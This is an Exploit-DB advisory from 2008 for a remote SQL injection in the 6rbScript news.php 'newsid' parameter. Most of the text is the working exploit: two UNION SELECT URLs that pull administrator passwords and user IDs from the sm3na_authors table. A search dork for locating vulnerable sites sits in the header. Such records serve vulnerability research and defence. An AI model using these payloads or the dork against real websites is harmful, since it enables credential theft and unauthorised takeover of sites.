6rbScript news.php newsid Remote SQL Injection Vulnerability

2008-05-21T00:00:00
ID EDB-ID:5663
Type exploitdb
Reporter Hussin X
Modified 2008-05-21T00:00:00

Description

6rbScript (news.php newsid) Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ##########################################################
#
#	6rbScript SQL Injection Vulnerability
#
#	by Hussin X
#
#	Home: www.tryag.cc/cc
#
#	darkangel_g85[at]Yahoo[DoT]com
#
#       DoRK: Powered by 6rbScript
##########################################################


##########################################################

Exploit:

PWD

http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--

USER

http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--




###########################################################

Greetz: All IRAQI And all HACKER

###########################################################

# milw0rm.com [2008-05-21]